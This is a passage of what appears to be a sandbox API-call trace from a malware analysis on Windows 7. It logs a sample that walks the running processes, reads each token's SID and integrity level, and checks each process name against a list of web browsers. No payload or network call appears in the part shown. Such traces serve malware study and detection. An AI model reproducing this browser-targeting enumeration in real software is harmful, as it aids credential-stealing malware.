[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.075] CloseHandle (hObject=0xb8) returned 1 [0227.075] CloseHandle (hObject=0xb4) returned 1 [0227.075] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0227.075] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0227.075] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0227.075] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0227.075] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0227.075] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0227.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0227.075] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.075] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.075] GetLastError () returned 0x7a [0227.075] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.075] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.075] CloseHandle (hObject=0xb8) returned 1 [0227.075] CloseHandle (hObject=0xb4) returned 1 [0227.075] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0227.076] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167798, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.076] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.076] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.076] GetLastError () returned 0x7a [0227.076] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.076] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.076] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.076] CloseHandle (hObject=0xb8) returned 1 [0227.076] CloseHandle (hObject=0xb4) returned 1 [0227.076] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0227.076] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0227.076] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0227.076] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0227.076] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0227.076] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0227.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0227.076] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.076] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.077] GetLastError () returned 0x7a [0227.077] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.077] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.077] CloseHandle (hObject=0xb8) returned 1 [0227.077] CloseHandle (hObject=0xb4) returned 1 [0227.077] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0227.077] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1678b8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.077] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.077] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.077] GetLastError () returned 0x7a [0227.077] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.077] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.077] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.077] CloseHandle (hObject=0xb8) returned 1 [0227.077] CloseHandle (hObject=0xb4) returned 1 [0227.077] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0227.077] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0227.077] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0227.077] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0227.077] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0227.078] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0227.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0227.078] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.078] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.078] GetLastError () returned 0x7a [0227.078] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.078] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.078] CloseHandle (hObject=0xb8) returned 1 [0227.078] CloseHandle (hObject=0xb4) returned 1 [0227.078] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0227.078] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1679f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.078] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.078] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.078] GetLastError () returned 0x7a [0227.078] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.078] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.078] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.078] CloseHandle (hObject=0xb8) returned 1 [0227.078] CloseHandle (hObject=0xb4) returned 1 [0227.078] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0227.079] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0227.079] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0227.079] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0227.079] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0227.079] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0227.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0227.079] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.079] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.079] GetLastError () returned 0x7a [0227.079] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.079] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.079] CloseHandle (hObject=0xb8) returned 1 [0227.079] CloseHandle (hObject=0xb4) returned 1 [0227.079] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0227.079] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167b10, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.079] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.079] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.079] GetLastError () returned 0x7a [0227.079] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.079] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.079] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.079] CloseHandle (hObject=0xb8) returned 1 [0227.080] CloseHandle (hObject=0xb4) returned 1 [0227.080] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0227.080] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0227.080] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0227.080] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0227.080] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0227.080] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0227.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0227.080] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.080] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.080] GetLastError () returned 0x7a [0227.080] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.080] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.080] CloseHandle (hObject=0xb8) returned 1 [0227.080] CloseHandle (hObject=0xb4) returned 1 [0227.080] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0227.080] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167c50, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.080] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.080] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.081] GetLastError () returned 0x7a [0227.081] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.081] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.081] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.081] CloseHandle (hObject=0xb8) returned 1 [0227.081] CloseHandle (hObject=0xb4) returned 1 [0227.081] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0227.081] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0227.081] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0227.081] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0227.081] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0227.081] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0227.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0227.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0227.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0227.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0227.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0227.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0227.081] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.082] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.082] GetLastError () returned 0x7a [0227.082] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.082] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.082] CloseHandle (hObject=0xb8) returned 1 [0227.082] CloseHandle (hObject=0xb4) returned 1 [0227.082] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0227.082] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1681e8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.082] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.082] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.082] GetLastError () returned 0x7a [0227.082] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.082] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.082] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.082] CloseHandle (hObject=0xb8) returned 1 [0227.082] CloseHandle (hObject=0xb4) returned 1 [0227.082] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0227.082] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0227.082] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0227.082] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0227.082] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0227.082] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0227.082] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0227.083] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0229.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xc0a0) returned 0xc0000004 [0229.093] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0229.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0229.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0229.095] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.095] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.095] GetLastError () returned 0x7a [0229.095] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.095] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.095] CloseHandle (hObject=0xb8) returned 1 [0229.095] CloseHandle (hObject=0xb4) returned 1 